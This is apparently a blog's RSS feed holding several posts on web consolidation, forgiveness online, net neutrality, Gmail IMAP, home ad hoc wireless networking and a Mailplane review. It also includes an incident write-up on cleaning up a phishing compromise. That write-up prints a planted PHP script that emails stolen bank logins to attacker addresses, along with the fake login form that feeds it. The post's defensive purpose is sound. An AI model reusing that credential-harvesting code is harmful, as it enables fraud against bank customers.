Chronosynclastic Infundibulum » internet http://www.semanticoverload.com The world through my prisms Thu, 07 Apr 2011 17:36:17 +0000 en-US hourly 1 http://wordpress.org/?v=3.5 Corporate Consolidation in Web 2.0 http://www.semanticoverload.com/2010/08/21/corporate-consolidation/ http://www.semanticoverload.com/2010/08/21/corporate-consolidation/#comments Sun, 22 Aug 2010 00:33:28 +0000 Semantic Overload http://www.semanticoverload.com/?p=688 In the 1960s, USA was host to a huge array of small business and stores. They have all but disappeared. The consolidation of corporations into the gaints that we see now have either gobbled up the mom-and-pop stores or driven them out of business. This started with the deregulation under Regan in the 80s. Next came the deregulation of media in the 90s which saw
many local TV and radio stations disappear to be replaced by commercial radio stations across the American landscape. I have a strong suspicion that the Internet is next.

source: blindfiveyearold.com

To clarify what I am talking about, take a look at the recent (and by recent I mean in the last 5 years or so) spate of acquisitions by all the big players in the Internet business (both hardware and software): Intel acquired McAfee, Google acquired Like.com (and before that YouTube, Blogger, Writely, and many more), Oracle acquired AmberPoint and Secerno, Yahoo recently acquired Korpol and citizensports.com, Microsoft acquired Sentillion and Opalis among so many more, Apple recently accquired Quattro, Lala media, Intrinsity, and Siri, and Cisco has made over 48 acquisitions in the last decade following by IBM with 35 [source].

This is just the tip of the iceberg, and if this is any indicator of things to come, then you can expect such large scale consolidation to leave the Internet services and infrastructure is very few large players. This coupled with the betrayal of Google against net neutrality makes for an ominous prediction.

Increasingly, it looks like the best hope of an Internet startup is to be acquired by one of these gaints because otherwise they risk being drowned by an ‘addon’ service offered by these gaints (sometimes for free). A great example is Facebook places and Google places vs. Gowalla, Foursquare, and their kind. So all your mom-and-pop store equivalent of Web 2.0 are now being consolidated into Google, Yahoo, Facebook, Intel, Oracle, Cisco, and few others.

So why is this bad? To get an idea of where that is going to leave us, take a look at what happened with the deregulation of the radio and TV stations in the US. You can’t get decent local news  and happenings anywhere except a few major cities. Rest of the places, local coverage is spotty. All local music now have to go to the major recording and music capitals of the nation just to be heard on the radio in their own home town. As a member of a local community radio station, I know how difficult things have become for independent radio broadcasters.

Expect something similar for the web. Expect to lose the rich and diverse sources of information and entertainment you are used to receiving from the web. It may not happen this year, or even in the next 5 years. But in the next decade, the web is going to be far less free than you see it today. The corporations want it that way, and that is how it will stay because the politicians won’t vote otherwise.

Welcome to Web 3.0 :-)

]]>
http://www.semanticoverload.com/2010/08/21/corporate-consolidation/feed/ 1
Testing our morals for forgiveness http://www.semanticoverload.com/2010/08/20/testing-our-morals-for-forgiveness/ http://www.semanticoverload.com/2010/08/20/testing-our-morals-for-forgiveness/#comments Fri, 20 Aug 2010 18:32:27 +0000 Semantic Overload http://www.semanticoverload.com/?p=683 I used to hold grudges against people for wronging me. With time I learned to forgive them, but I don’t think I ever forgot what they did to me. Interestingly, the deeds I remember the most are the ones I have been able to forgive the least. Even now I hold a childhood grudge which often times seems juvenile but I still find it difficult to forgive that person. But this post is not about my moral weaknesses. This is more about the hypocrisy that we all subscribe to when it comes to forgiveness.

Take any religious moral codex and it will emphasize of forgiving, and more about about forgiving even though one should not forget. This mantra worked well for, well, hundreds or even thousands of years, but now it seems to be coming under increasing attack. That attacks comes from the most unlikely source — the Internet!

Over the millenia, we (and by we, I mean human kind) have been able to forgive and let people start over mostly because we can forget. That is, we could forgive misdeeds because even though we remembered them at that time, we knew that our memory was fallible and so we would eventually forget the misdeeds. What’s the point of being unforgiving about something you don’t even remember? There is a lot of value in such forgiving because it makes you life a lot easier. It helps you be happy rather than be depressed by everything that has gone wrong because of someone else. In the end, if you did not forgive, then you will ending up hating a lot of people and not really know why! A tragic way to lead a life indeed.

Surprisingly, the Internet has changed all that because the Internet never forgets. So the traditional incentive to forgive (namely, that you will eventually forget it, so what’s the point in holding on to a grudge) is no longer there. Facebook, Google, Blogs, Twitter, message boards, discussion forums, all of them chronicle your life in a non-volatile fashion to enable you to recall everything about your life if you choose put your life up online. As it turns out, a lot of people put their life up online. So there you have it, now if you want to forgive, it would have to be true forgiveness, despite the fact that you will probably never forget.

How many people have such moral fortitute to be able to forgive despite not being able to forget?  Not many, I hazard to guess. In many ways,  forgetting may be viewed as our biological adaptation for a happier life. We have successfully invalidated that adaptation with the Internet. Now what?

The irony in this deal is that social networking, a mechanism created by technology to keep us happy by keeping us from becoming isolated has precipitated a side-effect that is now actively undermining the very some thing it strived to foster to begin with!

And I am not making all this up. This is not some high flying philosophical/spiritual rant with no material underpinning. Just take look at the news over the past year. Look at how many people we fired because of an indisrection that was years and years old and was discovered only recently thanks to Facebook. Consider the well-trained teachers who can now no longer teach because at some low point in their lives, they were forced to become an exotic dancer to pay their tuition and fees (Why? Because someone took her photograph during a bachlor party and put it up online). I can go on and on with more realistic (and potentially true) illustrations; but you get the point.

So now the question is, what are you prepared to truly forgive despite never forgeting. And this is not for any altruistic motive, but for a very selfish one. You happiness. Do you value your happiness enough to let someone else off the hook? Are you willing to forgive and never forget?

P.S.: Inspired by a post from Patrix and an NY Times article.

]]>
http://www.semanticoverload.com/2010/08/20/testing-our-morals-for-forgiveness/feed/ 2
If your site has been compromised with phishing attack code… http://www.semanticoverload.com/2009/03/17/if-your-site-has-been-compromised-with-phishing-attack-code/ http://www.semanticoverload.com/2009/03/17/if-your-site-has-been-compromised-with-phishing-attack-code/#comments Tue, 17 Mar 2009 07:30:42 +0000 Semantic Overload http://www.semanticoverload.com/?p=316 I recently recevied the following email:

To whom it may concern:

Please be aware that Wachovia Corporation (“Wachovia”) is the owner of numerous United States and foreign trade marks and services marks used in connection with its financial services and products (the “Wachovia Marks”), including the Wachovia wordmark and Wachovia logo.  Wachovia has expended substantial resources to advertise and promote its products and services under the marks and considers the marks to be valuable assets of Wachovia.

It has come to our attention that your company is hosting a known active phishing site.  The active phishing site displays the Wachovia Marks and is intended to defraud customers in an attempt to capture and use their identity.  Network Whois records indicate the IP address of the phishing site is registered to your Internet space.

Accordingly, we request that your site bring down the Phishing web site at:
<< http://<my website>/home/plugins/editors-xtd/confirm.html >>

So that’s how I knew that my site had been compromised by hackers and a phishing attack code had been injected into my site. If it has happened to you, do you know what is the right thing to do? How do you fix it? Well, here is what I did, and I think it is worthwhile to share this information so that it may be useful to others.. So here goes.

Step 1. Disable Your Site

First, disable your site, bring it down temporarily. The last thing you want is for more people to be scammed by a hacker who compromised your site. You can do that by disabling all access to all the files within your website. If the website is running on unix/linux you can do a “chmod -R 000 <website-home-directory>” (Refer to the chmod tutorial here). For those using cpanel, go to the file manager and change the permissions of the document root for the website.

Step 2. Investigate the Offending Webpage

Now that no more unsuspecting users can be affected by this phishing attack. Now we dig into the offending webpage that is causing the problem. In my case it was: http://<my website>/home/plugins/editors-xtd/confirm.html

I opened up the html file, and this is what I saw:

……

<html xmlns=”http://www.w3.org/1999/xhtml”><head>

<title>Wachovia – Personal Finance and Business Financial Services</title>

……

Clearly, someone was impersonating the Wachovia website. Now, with phishing, someone is trying to steal your username and password by impersonating some crediable website that needs your username and password to get into. In HTML, this is typically accomplished through ‘forms’, which starts with a `<form>’ tag in HTML. So I dug through the code and I saw two form tags.

The first one was:

<form method=”get” action=”http://search.wachovia.com/selfservice/microsites/wachoviaSearchEntry.do?” name=”searchForm” onsubmit=”return verifyQuery(this.searchString);”>

…..

This looks fine because the ‘action’ parameter points to http://search.wachovia.com/selfservice…. which is a search script on the Wachovia website. So anyone filling you this form is sendin their data to the Wachovia website and the hacker will not get any information from it.

Now to the second form tag:

<form method=”post” action=”screen.php” name=”uidAuthForm” id=”uidAuthForm” onsubmit=”return submitLogin(this)”>

……

Aha! The smoking gun! Why? Well, look at the ‘action’ parameter in this ‘form’ tag, it says ‘screen.php’ which is clearly not a script that is on the Wachovia servers, but something that is hosted on my website! So the hackers installed another script on my system to phish the username and passwords. Now I go see what’s inside this ‘screen.php’ file that is located in the same directory as the ‘confirm.html’ file we have been looking at so far.

Step 3. Isolate the script that is doing the actual phishing attack and find the offenders

So I open up the ‘screen.php’ file and this is what I find:

<?php

$ip = getenv(“REMOTE_ADDR”);
$datamasii=date(“D M d, Y g:i a”);
$userid = $HTTP_POST_VARS["userid"];
$password = $HTTP_POST_VARS["password"];
$mesaj = “Hello
userid : $userid
password : $password
——–0WN3d By Louis—————-
IP : $ip
DATE : $datamasii
“;

$recipient = “cashbug5010@gmail.com,smithgreen@hotmail.com”;
$subject = “Take What U need But Make Sure U Cash It Out !!!”;

mail($recipient,$subject,$mesaj);
mail($to,$subject,$mesaj);
header(“Location: http://www.wachovia.com/helpcenter/0,,,00.html”);
?>

So here we are! Gotcha! Check out the line ‘$recipient = “cashbug5010@gmail.com,smithgreen@hotmail.com”;’ Clearly, the phishing attack was being carried out by the following two email addresses: cashbug5010@gmail.com and smithgreen@hotmail.com. Now that I have this much information, what do we do next?

Step 4. Inform the Authorities

We give this information to the authorities who can carry the investigation forward. And who are they? First, respond back to the email address that alerted you of this phishing attack (do a ‘reply all’ if there were multiple recipients/Cc’s to the email you received). Also, copy phishing-report@us-cert.gov and cert@cert.org to this email and just give them a copy of the phishing code (in this case it was the file ‘screen.php’) and the offending email addresses you found.

As for now, that is all you can do, and just co-operate with the authorities if they need more information.

Step 5. Quarantine the Malicious Code and Restore Your Website

Quarantine the files (by disabling their permission to ’000′) and now that the code has been quarantined, you can bring your website up again by setting the permission back to as they were earlier (except for the offending code).

DO NOT DELETE THE MALICIOUS CODE BECAUSE IT IS EVIDENCE AGAINST THE PHISHING ATTACK AND EXONERATES YOU! Otherwise, the authorities may pursue you as an accessory to the crime!

Step 6. Inform Google That Your Site is Safe Again

Now, note that the odds are that Google has already put a notice out against your site as a source of a phishing attack. So go to the following URL http://www.google.com/safebrowsing/report_error/ to let Google know that the problem has been taken care off and you site is safe again.

And that’s all you can do for the moment. Make sure your site is secure and you haven’t given permission to any of your directories to be writable by anyone except you. As for preventing future security breaches, it is always a cat-and-mouse game with hackers and like of you getting smarter and better than the other.

]]>
http://www.semanticoverload.com/2009/03/17/if-your-site-has-been-compromised-with-phishing-attack-code/feed/ 7
Net Neutrality: what is it really about? http://www.semanticoverload.com/2008/04/25/net-neutrality/ http://www.semanticoverload.com/2008/04/25/net-neutrality/#comments Fri, 25 Apr 2008 22:01:41 +0000 Semantic Overload http://www.semanticoverload.com/?p=158 Net Neutrality has been an ongoing debate for quite a few years now. In its simplest terms, net neutrality is a principle that states that all traffic on the internet must be treated the same way; that there should be no preferential treatment to a specific kind or class of traffic. The are many camps for and against net neutrality. Each group fervently advocates its position on the issue, while slinging mud on the other camp. This debate has polarized large sections of stakeholders on the internet. Unfortunately, most of the polarization is based more on propaganda and prejudice than facts. Investigating the net neutrality issue reveals that the waters are indeed quite muddy.

The groups supporting net neutrality — like SaveTheInternet.com Coalition — argue that net neutrality is fundamental to the success of the internet. Net Neutrality prevents ISPs from speeding up or slowing down Web content based on its source, ownership or destination. If ISPs are allowed to slow certain web content down and speed others up, based of Service Level Agreements (SLA) with content providers (like Reuters, Fox News, Yahoo, Google, Facebook etc.), then this will result in all big corporations signing SLAs with all ISPs, and individual content providers like bloggers will be left out in the cold, and there is little that can be done against such discrimination. In essence, the advocates argue that net neutrality an extension of free speech, and is necessary to protect free speech on the internet. Other implications of not having net neutrality include ISPs allowing (say) Google’s pages to load faster than (say) Yahoo’s (because Google signed an SLA with the ISP), thus denying its users efficient access to their trusted source of information.

The groups opposing net neutrality — like Hands Off The Internet Coalition — argue that heavy regulation of the internet runs against free market economics, and that such restrictions slow down the rate of innovation on the internet. They argue that different kinds of internet traffic have different requirements. For instance, live chat requires less bandwidth, but the traffic cannot be delayed, on the other hand streaming video requires high bandwidth, but can afford some delay because the video is buffered at the viewing computer, downloads can withstand occasional delays and low bandwidth. It makes sense treat each of these traffic streams differently in order to provide a better user experience, but net neutrality prohibits this.

Lets see how the arguments for and against net neutrality really stand up to criticism.

Now, if net neutrality was implemented as a strict regulation, this can give rise to a lot problems. For instance, how do network providers treat spam under net neutrality? Currently, network providers can block spam at the entry point into their network. If the networks are expected to treat all traffic equally, then they have to treat spam the same as other traffic. Which implies that they are having to bear the cost of routing spam on their networks with no income from it. Guess who they will pass that cost on to: the consumers. So is net neutrality really what the consumers want?

If customers subscribed to a pay-per-view service over the internet, then customers have every right to be guaranteed a satisfactory viewing experience. However, the network provider cannot do that under net neutrality because the provider is not allowed to allocate bandwidth for the pay-per-view service. So is net neutrality really helping?

On the other hand, if net neutrality wasn’t implemented then this would allow network providers to treat different kinds of traffic differently, thus providing a better user experience. But if that were truly an issue then how do different classes of network traffic work well today without so-called ‘tiered’ services for different classes of traffic. Answer: there is more bandwidth in the network core than the traffic consumes. As long as there is good admission control on the edge of the Internet, it doesn’t seem like you need such ‘tiered’ services. Wouldn’t that make the ‘tiered’ services argument too weak?

Consider the competition between VoIP services and traditional phone lines. Typically all your phone providers are also ISPs. And VoIP is very sensitive to delay in the traffic, more so than web browsing, streaming video, or downloads. So if the ISPs wanted to discourage their customer from using VoIP services, then they could do that by simply delaying packets for a few seconds randomly. For web browsing and other services, it would only show up as a few seconds delay in a page loading, or a delay in the video starting, which is easily tolerable. But with VoIP, this would show up as a jitter in a voice call. This would make VoIP unusable. Don’t we need regulations to protect the customers from such practices? Isn’t net neutrality a way out of this?

So net neutrality, while addressing some issues, opens up other problems which the Internet community will have to deal with. Worse, while it is easy to make a regulation like net neutrality, it is very difficult to enforce it. How do you detect a violation of net neutrality? If ‘bad’ ISPs are smart enough, then they can hoodwink any mechanism to detect such violations. It can range from delaying all traffic for a few seconds so that only VoIP services are affected, to dropping only certain kinds of traffic during periods of traffic congestion. The above two techniques is indistinguishable from situations where a `good’ ISP is having traffic management problems and so is forced to delay traffic, or is forced to drop traffic during congestion. So how do you distinguish ‘bad’ ISPs from ‘good’ one and penalize only the ‘bad’ ones? Its not always possible.

So, if net neutrality is more a regulation in theory, than something which can be enforced successfully, and people do realize it, then why do we have groups advocating for it so strongly? What could be gained from it, other than a rhetorical stand on the ideals that they strive for? The answer might surprise you.

Ironically, the arguments being made on both sides of net neutrality fails to address the real issue. In fact, it serves to hide the real issue of why net neutrality has become such a focal point of conflict on the internet today. To understand this better, lets see who are the corporate entities involved in the net neutrality debate. The supporters of net neutrality include the likes of Google, Yahoo, eBay and AeA. The opposers of net neutrality include the likes of 3M, Cisco Systems, Qualcomm, Verizon, AT&T, and Time Warner. Note that there is a clear division of the functional roles of each camp. The camp which supports net neutrality are all content providers where as the camp which opposes net neutrality are all network infrastructure providers.

Why do content providers like net neutrality? Because it allows the content providers to innovate and come up with new applications and solutions without having to worry about how these application will be treated by the network. Why do network infrastructure providers oppose net neutrality? Because this will aloow for innovation and diversity in network infrastructure to accommodate new applications and solution which can evolve from the Internet. What does this mean? This means that net neutrality is no longer about free speech, or democracy, or free market, or any ideals. Its all about who gets to control the internet and the innovation in it. Net neutrality, under the hood, is an ongoing battle between content providers and infrastructure providers over who controls the web and the innovation in it.

]]>
http://www.semanticoverload.com/2008/04/25/net-neutrality/feed/ 0
Making Your Presentations Portable http://www.semanticoverload.com/2008/04/21/making-your-presentations-portable/ http://www.semanticoverload.com/2008/04/21/making-your-presentations-portable/#comments Mon, 21 Apr 2008 22:32:18 +0000 Semantic Overload http://www.semanticoverload.com/?p=150 I had the following problem(s):

  • I had a fairly large presentation which I had to share among several people for review.
  • Not everyone was running the same version of Powerpoint, and not everyone used Windows.
  • People who wouldn’t be able to make it to my actual presentation wanted to be able to view it (along with the voice narration) later.
  • I wanted it to be accessible and usable by everyone regardless of the OS, the browser, or the presentation software they were using.

I figured this was a pretty common problem that many people face and a documented solution would be nice. More so, since someone I demonstrated this solution to now swears by it and can’t thank me enough. So I figured, why not spread the knowledge :) (Unfortunately, this solution works only if you are using Windows XP/Vista. Sorry, I couldn’t find the right tools to make it work on MAC OS X.)

Here’s the bird’s eye view of my solution:

  1. Prep your presentation to be made ‘complete’ and ‘kiosk-ready’.
  2. Download and install AuthorPoint Lite.
  3. Import the presentation into AuthorPoint Lite, and preserve the rehearse timings, animations, and (optionally) narration.
  4. Convert the presentation to flash using AuthorPoint Lite.
  5. Upload the generated swf file online for the world to see!
  6. The End.

Prepping your presentation

Before you can make a presentation portable, you have got to make sure that the presentation itself has enough information in it to be portable. Also, you have to ensure that the presentation have been configured so that the tools you will use to make it portable can use it to advantage.

So here’s how you would go about the job:

Ensure all information is available

When are making a presentation portable, then, more often than not, the people who will access it will not have the luxury of you walking through the presentation for them. So make sure you have notes for each slide for the presentation to be understandable on its own, even without the speaker present. It often a good idea to include the text of your narration for each slide in the Slide Notes section.

Recording Narration

You also have the choice of recording your narration. You can do this if you would like people to be able to view and hear your presentation online. In order to record your presentation (Assuming you have a workgin microphone to record) you need to do the following:

  • Ensure that you have no automatic animations set. You can do that as follows:
    1. Click on the Slide Show menu and choose Custom Animation.
    2. Click on the first item in the Animation Order box on the Order & Timing tab.
    3. Select the On Mouse Click radio button under Start Animation as shown in the figure below.Unset Custom Animation
  • Test your microphone by opening Slide Show -> Record Narration -> Set Microphone Level button. You’ll see the Microphone Check dialog box pop up. Set the level appropriately as shown below:Testing Microphone
  • You can adjust the sound quality if you like:
    Adjust Sound Quality
  • DO NOT check the ‘Link the Narrations’ checkbox! This option being unchecked is very important for portability!
  • Now start recording you narration and manually click through the slides (and animation) as you narrate into the microphone. You can stop anytime by pressing [Esc]. After you reach the last slide, or after you press [Esc], PowerPoint will ask if you’d like to save the slide timings. Click No. (As shown below):
    Save Slide Timings Dialog
  • Now you can browse through the slides and review your narration by clicking on the sound icon icon. You can delete the narration on each slide and record the narration if necessary.

Rehearsing Timing

Click on the Slide Show menu and choose Rehearse Timings. You’ll immediately be transferred into Slideshow View, and the narration should begin. You’ll see a Rehearsal toolbar appear:

rehearse timing

Advance through the presentation by advancing to the next slide when the narration for each slide is complete. Also make sure that you step through the animation appropriately. When you’ve scrolled through the entire presentation, PowerPoint will again ask if you’d like to save the timings. Click Yes.

Now your presentation is self-contained and complete. However, it is still a .ppt file. To make it portable, you need to convert it to a more portable format. My choice is ShockWave File, or Flash format.

AuthorPoint Lite

AuthorPoint Lite is a free Powerpoint-to-Flash converter. The neat thing about this software is that it can import all the settings from a powerpoint slide including narration, rehearsed timing, custom animation etc. Here is a great review on AuthorPoint Lite.

  • Download and install AuthorPoint Lite
  • Import your presentation into AuthorPoint Lite.
  • Save it as a swf file.

Uploading the swf file

Now upload the saved swf file to your webserver, and provide a link to it on your website. This swf file is your presentation complete with your narration, animation, slide timings, your slide notes, etc. And the best part is that sinceits a swf file, any browser with a flash plugin can play this file! Truly portable!

Enjoy

The End

:)

]]>
http://www.semanticoverload.com/2008/04/21/making-your-presentations-portable/feed/ 5
Gmail with IMAP — First Impressions http://www.semanticoverload.com/2007/11/04/gmail-with-imap-first-impressions/ http://www.semanticoverload.com/2007/11/04/gmail-with-imap-first-impressions/#comments Mon, 05 Nov 2007 04:56:57 +0000 Semantic Overload http://semanticoverload.gaddarinc.com/?p=132 Finally, over a week and a half after the initial announcement, IMAP was finally enabled on all my Gmail accounts. Until now I used POP to access my emails from gmail, and had to use the ‘recent:’ option to be able to access my emails from multiple locations. With IMAP, thankfully, that will change soon.

A quick intro to IMAP. As described by Tom Spring from PC World:

IMAP is geek speak for Internet Message Access Protocol. ….
… with IMAP any changes (sorting, deleting, reading, or otherwise) are reflected across all Gmail interfaces – be it using Outlook Express, your iPhone, or Web-based Gmail. For example if you create a folder and sort messages into it using your desktop Outlook Express client those changes show up on Web-based Gmail.

IMAP is a boon for people like me, who check their emails from multiple locations. So I decided to give IMAP support on Gmail a spin, and here’s what I came up with:

For starts Gmail has done a remarkable job of supporting IMAP. I can understand the technical difficulty in being able to support IMAP on Gmail. Think about it: Gmail moved away from conventional folder based email organization to offer what is essentially a tag-based (label-based) organization of email (although their tagging interface is too cumbersome in my opinion). Given that IMAP is a folder-based email access protocol, reconciling the two is not an easy task. But Google has done a good job of it this time around.

For starts, after you enable IMAP, and configure your mail client there are changes that you will notice in the web-based Gmail interface.

  • All the folders that you create using your email client will now appear as labels in your web interface.
  • Certain labels like Trash, or Chats are reserved by gmail. If you try to create a folder by that name, then the folder will appear as ‘[imap]/foldername’
  • If you have any label of form ‘text1/text2′, they will now appear as folder ‘text2′ being a subfolder of folder ‘text1′. So If you have any labels of the form ‘family/friend’, or ‘work/spam’, consider renaming them without a ‘/’ before enabling IMAP.

So how did tag-based Gmail reconcile with folder-based IMAP?

  • Each label appears as a separate folder in IMAP.
  • To apply multiple labels, just copy the email to multiple folders.
  • Moving an email from one folder to another will change the label on the email from the first label to the other.
  • If you move an email to a sub-folder ‘sub’ within a main folder ‘main’, on the web interface, it will show up as being labeled ‘main/sub’.
  • If you configure you mail client to sent email using gmail’s smtp server, then every copy of the email is stoed in the ‘[Gmail]/Sent Mail’ folder.

Here are the set of IMAP actions and their corresponding web based Gmail actions.

Spam, however, is handled differently. To mark a message as spam, just move it to the ‘[gmail]/spam’ folder in the IMAP interface. Simply marking the email as ‘spam’ on your mail client (like Thunderbird) will trigger the email client’s spam filters, but not Gmail’s.

Drawbacks

  • One The only major drawback is that the IMAP’s default trash folder is different from Gmail’s Trash folder. There’s no easy way to fix it. The only fix that I found to work for Thunderbird is here on Tech Samurai. It not the most straight forward config change to make Thunderbird to GMail’s Trash folder.
  • The bigger issue with the simulation of folder-based structure on top of tag-based structure is the following:
    If an email has multiple tags (labels) associated with it, then the email shows up in multiple folders on the IMAP client. ‘Deleting’ such an email involves deleting (or moving to [Gmail]/Trash) all the virtual copies of the email from all the folders where they reside. This can be a arduous task, especially if do not know all the labels that were applied to the message to begin with (and you dont, if you are using the IMAP interface exclusively.

Overall, a really clean and neat implementation on Google’s part. Good job Google!

]]>
http://www.semanticoverload.com/2007/11/04/gmail-with-imap-first-impressions/feed/ 0
Home Wireless Network without a router http://www.semanticoverload.com/2007/10/25/home-wireless-network-without-a-router/ http://www.semanticoverload.com/2007/10/25/home-wireless-network-without-a-router/#comments Fri, 26 Oct 2007 00:06:58 +0000 Semantic Overload http://semanticoverload.gaddarinc.com/?p=128 Digg this article.

Ever wondered if you could get a short-range wireless network (for your home) without a wireless router? Well, it is possible. Here’s how:

Things you need

  1. A home computer/laptop with an Ethernet port and wireless card (this computer will then double up as a wireless router).
  2. Internet connection that terminates at your home computer/laptop
  3. Client computers/laptops with wireless cards
  4. Note that the instructions here are for Windows XP, other operating systems will probably have similar ways to accomplish what I am giving you instructions for.

Basic Idea

The basic idea is to set up an ad hoc wireless network among all the computers/laptops so that each one can communicate with the other through the wireless network. Now designate one of the computers as a gateway. The gateway computer is connected to the internet its wired Ethernet connection. Get the gateway to advertise itself as the default internet gateway to all other computer in the ad-hoc network. Now all the computers will start accessing the internet through the gateway computer. Thus the wireless network is established.
Something like this:
Home Wireless Network without a wireless router

Detailed Instructions

  1. Configuring your wireless card on the gateway computer
  2. Your gateway computer is already connected to the internet using a wired connection. We configure the wireless card on the gateway computer as follows:

    • Go to control panel, switch to classic view and click on Network Connections. This should take you to the list of network adapters on your system. Right-click on your wireless network connection and select Properties.
    • Click on Wireless Networks tab in the properties window, and it should look something like this:
    • Wireless Networks tab of wireless card

    • In this tab, click on the Advanced button right next to ‘Learn about setting up a wireless network configuration‘. You should see a window that looks like this:
    • Advaced configuration of wireless networks

    • Click on Computer-to-computer (Ad Hoc) networks only, and then click Close.
    • You should now be back in the Wireless Networks tab of the wireless card properties window. Click on Add button (to add a new ad hoc network). You should see a window that looks something like this:
    • Adding a new ad hoc network

    • Give you ad hoc network the name that you want. I called it ‘Peggy Sue’ in my example. Let the Network Authentication be ‘open‘. You can configure authentication later, if you want. Then, click Ok.
  3. Configuring the Wired connection on the gateway computer
  4. Now you have a ad hoc wireless network, and a connection to the internet. You have to configure them to talk to each other other so that traffic from the ad hoc wireless network can access the internet. You do so by ‘sharing’ the internet connection as follows:

    • Go to control panel, switch to classic view and click on Network Connections. This should take you to the list of network adapters on your system. Right-click on your local area connection and select Properties.
    • Go to the Advanced tab which looks something like this:
    • Advanced properties of the LAN connection

    • Check the box that says ‘Allow other network users to connect through this computer’s internet connection‘. And click Ok.

    Now when you right-click on the wireless network connection and click on view wireless networks, you should see something like this:
    list of wireless networks including Peggy Sue

  5. Connecting other wireless clients to the network
  6. All you now have to do is start up other computers, and connect to the ad hoc wireless network (Peggy Sue) that you just created and you should be good to browse the internet wirelessly!

]]>
http://www.semanticoverload.com/2007/10/25/home-wireless-network-without-a-router/feed/ 7
Mailplane, reviewed http://www.semanticoverload.com/2007/08/24/mailplane-reviewed/ http://www.semanticoverload.com/2007/08/24/mailplane-reviewed/#comments Sat, 25 Aug 2007 03:59:15 +0000 Semantic Overload http://semanticoverload.gaddarinc.com/?p=114 To put succinctly, Mailplane is Gmail with MAC OS X UI (Sorry, there is no windows port as of now). Its like a browser that renders gmail, and gmail alone.

I have been using Mailplane for a few days now here are my first impressions.

Like most MAC applications, Mailplane is ridiculously easy to install, and configuration is done with just a handful keystrokes. All you really need, as far as configuration goes, is your Gmail username and password. Here are is a screenshot of Mailplane.

Mailplane screenshot

Mail client style features with gmail style freedom

As you can see from the screenshots, the main window is simply the gmail interface. There is nothing fancy about it. The magic is around the main window. Its the toolbars. You have outlook/thunderbird style icons that allow you to compose messages, reply (all), star, archive etc. So for people who are more comfortable with outlook/thunderbird style desktop email clients, but want the versatility and search capability or gmail, Mailplane is the perfect application for them.

You can also configure Mailplane to be your default email client. If gmail is your primary email, and you don’t like using email clients, then when you come across links like <a href=”mailto:abc@xyz.com>, then you have to highlight the link, right click (or control-click), copy email address, open new message on gmail, paste the email you copied, and so on. Its too many clicks and too painful.

With Mailplane as you default mail client, just click on the email link in your browser, and it automatically opens up Mailplane, takes you to the compose message window with the email already pasted in the ‘To:’ field. All in just one click!

Support for Multiple Gmail Accounts

The feature I liked best about it was that it has support for multiple gmail accounts. So if you have multiple gmail accounts (most of them do), and you would like to be able to switch between them like you would switch between tabs of a browser, Mailplane is the answer to your prayers. You can configure it to handle as many gmail accounts as you want and switch between the accounts with a mouse click (actually it a double-click).

Support for Google Hosted Accounts

Now its not just multiple gmail accounts it supports, it also supports multiple google hosted emails as well. (If you are wondering what exactly is Google hosting check out Google Apps). One of my domain’s email is hosted by google. I have an admin email, and a user email that I like to keep separate. With traditional web based email, I could access only one account at a time. With Mailplane, I can now access both accounts simultaneously, not to mention other gmail accounts as well.

Get IMAP-like behavior with Gmail

I personally prefer desktop clients as email viewers and the email servers for email storage. IMAP works really well for that, but gmail (and google hosted email) does not support IMAP. With Mailapp, however, I can get IMAP like behavior with an desktop client like features and my emails are still stored at the gmail server. Its a good trade-off to make.

ISP blocks traffic to google SMTP server? No problems

If you configure a desktop email client to send and receive messages from gmail (or google hosted email), then you have probably noticed the following problem: You ISP blocks all send mail requests to your google SMTP server (because ISPs want you to use their SMTP server). The issue with such restriction is that if you don’t send you email via google’s SMTP server, then the sent mail wont show up in your sent mail folder (label) on your gmail.

With Mailplane however, this is no longer an issue. Mailplane sends emails via HTTP (your browser), and so if you send emails via Mailplane, then they will show up on you sentmail! Problem solved.

iLife and Mailplane

Its biggest selling point is its iLife integration. It allows you to drag-and-drop attachment, import photographs from iPhoto, automatically optimize it for the web before attaching, etc. It also integrates well into the Growl notification system which is great feature because then it pretty much does the job of a Gmail Notifier without having to install a new application.

Additionally, integration with Growl also allows Mailplane to send notifications to you on the screen when someone IMs you on google talk. Currently, if you are on mac, then you can only use the web-based google chat, and if you don’t have your speakers on, then there is no way for you to know if someone is messaging you unless you specifically check you gmail window. With Mailplane, you will get a Growl notification on your screen if someone messages you on google chat. This, IMHO, is a much needed feature for google chat for Mac users.

So, yeah, Mailplane is all great and wonderful. But its not without its issues.

It works only on Mac OS X Tiger or later

So if you use any other operating system be it windows, linux, Mac OS X 10.3 or lower there is no Mailplane port for it, and there probably wont be

Its free because its still in beta

Mailplane is free for now because it is still in beta. Once its stable enough for a general release the developer(s) are planning on releasing it as a shareware with a three week evaluation period. So yeah, in the general sense its not free.

It does send email notifications, but…

If you have Growl installed, then email notifications are sent, but only for the currently active account on the Mailplane window. So if you receive new mail from another account that is currently not the active one, Mailplane is simply silent about it.

mailto:, but as who?

If Mailplane is configured as the default email client, then on clicking on any ‘mailto:’ style link, the browser opens up Mailplane and opens a gmail compose window. However, it opens the compose window for the currently active account on Mailplane. Which means if you have two accounts on Mailplane, viz., abc@gmail.com and xyz@hostmail.com, and xyz@hostmail.com was on the active window, then if you click on a ‘mailto:’ link, the compose window will be for the account xyz@hostmail.com. If you wanted to compose email as from abc@gmail.com, then you’d either have to do it the old fashioned way be copying the email address, opening the account abc@gmail.com, and pasting the email. Else, you have to first switch to abc@gmail.com account on Mailplane and then click on the ‘mailto:’ link. In either case it defeats the advantage of having a one-click-to-compose feature on Mailplane.

It works but its slow

Compared to desktop email client, Mailplane is slow. It is slow in starting up, logging in, and in switching accounts. So if speed is your thing, then Mailplane will disappoint you.

Supports keyboard shortcuts, but you’ll need to relearn them

Although Mailplane has support for keyboard shortcuts (like gmail does), the keyboard shortcuts are Mac-syle and are very different from the ones that gmail has. So if you are someone used to gmail keyboard shortcuts, and likes to use keyboard shortcuts, then you’ll have to relearn them. Not my idea of time well spent.

So who should use it and how?

For starts, you need a Mac with OS X 10.4 or later. The following apply:

  1. If you have one gmail (or google hosted) account as your primary account, and you’d like to send emails from that account most of the time, then install Mailplane and use it as a default mail client.
  2. If you have multiple gmail (or google hosted) accounts that check regularly, and you don’t like having to log in and out of your various accounts multiple times, then Mailplane is what you need.
  3. If you’d like to be notified every time you received an email, then install Mailplane with Growl.
  4. If you have multiple identities that you mail from, and you have configured one gmail (or google hosted) account to handle all those identities, then use Mailplane for just that account and set Mailplane as your default mail client.

